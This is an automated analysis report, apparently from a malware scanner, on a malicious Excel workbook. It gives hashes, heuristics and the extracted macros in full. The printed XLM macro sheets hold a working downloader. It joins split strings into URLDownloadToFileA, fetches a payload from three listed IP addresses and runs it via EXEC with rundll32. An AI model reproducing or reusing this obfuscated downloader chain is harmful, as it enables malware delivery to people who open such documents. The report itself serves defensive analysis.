Office (OOXML) malware analysis — malicious · 1998ef8dde9e2b82

MALICIOUS

Office (OOXML)

110.4 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-05-22

MD5: c31aacc0cbcc6514a2e58f6b21d9b8aa SHA-1: 3e4f065659bb87ed6dee08a87dccb954dfbdaa7c SHA-256: 1998ef8dde9e2b82bfed9986d8b22c5158169636eb08588bb6404f381fdddeed

158 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

This Excel document contains critical Excel 4.0 macros that utilize dangerous functions like CALL and EXEC to download and execute a payload. The Auto_Open VBA macro further orchestrates the execution of these XLM macros. The embedded URLs point to potential payload hosting locations, indicating a downloader or dropper functionality.

Heuristics 6

Excel 4.0 macro sheet (3 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
Dangerous XLM formula APIs: HALT, GOTO, REGISTER, EXEC critical OOXML_XLM_DANGEROUS_FN

Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
VBA project inside OOXML medium 1 related finding OOXML_VBA

Document contains a VBA project — VBA macros present
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Attribute VB_Name = "Module1"
Function Auto_Open()
```
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET

Excel workbook contains 3 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://185.45.193.74/44313,6048108796.dat Referenced by macro
- http://195.123.220.175/44313,6048108796.datReferenced by macro
- http://45.144.29.253/44313,6048108796.datReferenced by macro
- http://185.45.193.74/Referenced by macro
- http://195.123.220.175/Referenced by macro
- http://45.144.29.253/Referenced by macro
- http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 5

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	796 bytes
SHA-256: `75218b3f0bb17eeec5572784caf45beb820d0c1786c79b4827590e90358f3168`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ЭтаКнига" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Лист1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" Function Auto_Open() Application.Run Sheets("JUtgsgg").Range("AJ6") Application.Run Sheets("JUtgsgg").Range("A5") End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	13824 bytes
SHA-256: `f94c515c15a2369b46850e056a403c6ee0151dcf0eaaee0fd438d3a90bd5464f`
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.xml	4291 bytes
SHA-256: `3b11ac276e03e0a75147eb42f7fa8acafe7bfdb28b0154bb5f4e04a17633ef7a`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{DF8B6045-B836-40DC-A5AC-AC252F7F483B}"><dimension ref="AE92:AK113"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="13.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="29" width="13.5703125" style="1"/><col min="30" max="30" width="13.5703125" style="1" customWidth="1"/><col min="31" max="33" width="13.5703125" style="1" hidden="1" customWidth="1"/><col min="34" max="34" width="19.5703125" style="1" hidden="1" customWidth="1"/><col min="35" max="35" width="13.5703125" style="1" hidden="1" customWidth="1"/><col min="36" max="36" width="21.5703125" style="1" hidden="1" customWidth="1"/><col min="37" max="37" width="13.5703125" style="1" hidden="1" customWidth="1"/><col min="38" max="38" width="13.5703125" style="1"/><col min="39" max="39" width="21.42578125" style="1" bestFit="1" customWidth="1"/><col min="40" max="16384" width="13.5703125" style="1"/></cols><sheetData><row r="92" spans="33:36" x14ac:dyDescent="0.25"><c r="AI92" s="1"><v>1</v></c></row><row r="93" spans="33:36" x14ac:dyDescent="0.25"><c r="AI93" s="1"><v>9</v></c></row><row r="94" spans="33:36" x14ac:dyDescent="0.25"><c r="AJ94" s="1" t="b"><f>ON.TIME(NOW()+"00:00:02","Grestes")</f><v>0</v></c></row><row r="95" spans="33:36" x14ac:dyDescent="0.25"><c r="AG95" s="1" t="str"><f>CONCATENATE(AG101,AH95,AG99,AG100)</f><v>http://185.45.193.74/44313,6048108796.dat</v></c><c r="AH95" s="1"><f>NOW()</f><v>44313.604810879631</v></c></row><row r="96" spans="33:36" x14ac:dyDescent="0.25"><c r="AG96" s="1" t="str"><f>CONCATENATE(AG102,AH95,AG99,AG100)</f><v>http://195.123.220.175/44313,6048108796.dat</v></c></row><row r="97" spans="33:36" x14ac:dyDescent="0.25"><c r="AG97" s="1" t="str"><f>CONCATENATE(AG103,AH95,AG99,AG100)</f><v>http://45.144.29.253/44313,6048108796.dat</v></c><c r="AJ97" s="1" t="b"><f>HALT()</f><v>0</v></c></row><row r="98" spans="33:36" x14ac:dyDescent="0.25"><c r="AH98" s="1" t="str"><f>CONCATENATE(AG106,AG107,AG113)</f><v>URLDownloadToFileA</v></c></row><row r="99" spans="33:36" x14ac:dyDescent="0.25"><c r="AG99" s="1" t="s"><v>0</v></c><c r="AI99" s="1" t="s"><v>1</v></c></row><row r="100" spans="33:36" x14ac:dyDescent="0.25"><c r="AG100" s="1" t="s"><v>2</v></c></row><row r="101" spans="33:36" x14ac:dyDescent="0.25"><c r="AG101" s="1" t="str"><f>"http://185.45.193.74/"</f><v>http://185.45.193.74/</v></c><c r="AI101" s="1" t="s"><v>3</v></c></row><row r="102" spans="33:36" x14ac:dyDescent="0.25"><c r="AG102" s="1" t="str"><f>"http://195.123.220.175/"</f><v>http://195.123.220.175/</v></c><c r="AI102" s="1" t="s"><v>4</v></c></row><row r="103" spans="33:36" x14ac:dyDescent="0.25"><c r="AG103" s="1" t="str"><f>"http://45.144.29.253/"</f><v>http://45.144.29.253/</v></c></row><row r="104" spans="33:36" x14ac:dyDescent="0.25"><c r="AH104" s="1" t="e"><f>GOTO(Blodas!G6)</f><v>#N/A</v></c></row><row r="105" spans="33:36" x14ac:dyDescent="0.25"><c r="AI105" s="1" t="s"><v>5</v></c></row><row r="106" spans="33:36" x14ac:dyDescent="0.25"><c r="AG106" s="1" t="str"><f>"URLDow"</f><v>URLDow</v></c></row><row r="107" spans="33:36" x14ac:dyDescent="0.25"><c r="AG107" s="1" t="str"><f>"nloadToF"</f><v>nloadToF</v></c></row><row r="113" spans="33:33" x14ac:dyDescent="0.25"><c r="AG113" s="1" t="str"><f>"ileA"</f><v>ileA</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
`xlm_sheet_01.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet2.xml	2111 bytes
SHA-256: `a5fc80b1569128bd0323daacf4b0484b147d9d37755aacc26435ea011bd9f0cd`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{505B4405-D1BA-4A49-969C-12F950A2EDD3}"><dimension ref="G11:G18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="7.85546875" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="7.85546875" style="1"/></cols><sheetData><row r="11" spans="7:7" x14ac:dyDescent="0.25"><c r="G11" s="1" t="b"><f>REGISTER(JUtgsgg!AI99,JUtgsgg!AH98,JUtgsgg!AI101,JUtgsgg!AI102,,JUtgsgg!AI92,9)</f><v>0</v></c></row><row r="12" spans="7:7" x14ac:dyDescent="0.25"><c r="G12" s="1" t="e"><f>Belandes(0,JUtgsgg!AG95,JUtgsgg!AI105,0,0)</f><v>#NAME?</v></c></row><row r="13" spans="7:7" x14ac:dyDescent="0.25"><c r="G13" s="1" t="e"><f>IF(G12<0, Belandes(0,JUtgsgg!AG96,JUtgsgg!AI105,0,0))</f><v>#NAME?</v></c></row><row r="14" spans="7:7" x14ac:dyDescent="0.25"><c r="G14" s="1" t="e"><f>IF(G13<0, Belandes(0,JUtgsgg!AG97,JUtgsgg!AI105,0,0))</f><v>#NAME?</v></c></row><row r="16" spans="7:7" x14ac:dyDescent="0.25"><c r="G16" s="1"><f>IF(G14<0,CLOSE(0),)</f><v>0</v></c></row><row r="18" spans="7:7" x14ac:dyDescent="0.25"><c r="G18" s="1" t="e"><f>GOTO(Jioka!H4)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
`xlm_sheet_02.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet3.xml	1944 bytes
SHA-256: `a6c079d2a564b952bdc7f60d49402489a374e91f07f8b51ef328523d2a650900`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{E09DE6CC-F7FE-45A7-AA3D-E8E197BA8A24}"><dimension ref="H7:I20"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="9.140625" style="1"/><col min="8" max="8" width="9.85546875" style="1" customWidth="1"/><col min="9" max="16384" width="9.140625" style="1"/></cols><sheetData><row r="7" spans="8:9" x14ac:dyDescent="0.25"><c r="I7" s="1" t="str"><f>"rund"</f><v>rund</v></c></row><row r="9" spans="8:9" x14ac:dyDescent="0.25"><c r="I9" s="1" t="str"><f>"ll32 ..\TYFYTY.GVTYGU,DllReg"</f><v>ll32 ..\TYFYTY.GVTYGU,DllReg</v></c></row><row r="10" spans="8:9" x14ac:dyDescent="0.25"><c r="I10" s="1" t="str"><f>"isterServer"</f><v>isterServer</v></c></row><row r="16" spans="8:9" x14ac:dyDescent="0.25"><c r="H16" s="1" t="b"><f>EXEC(I7&I9&I10)=PI()</f><v>0</v></c></row><row r="20" spans="8:8" x14ac:dyDescent="0.25"><c r="H20" s="1" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.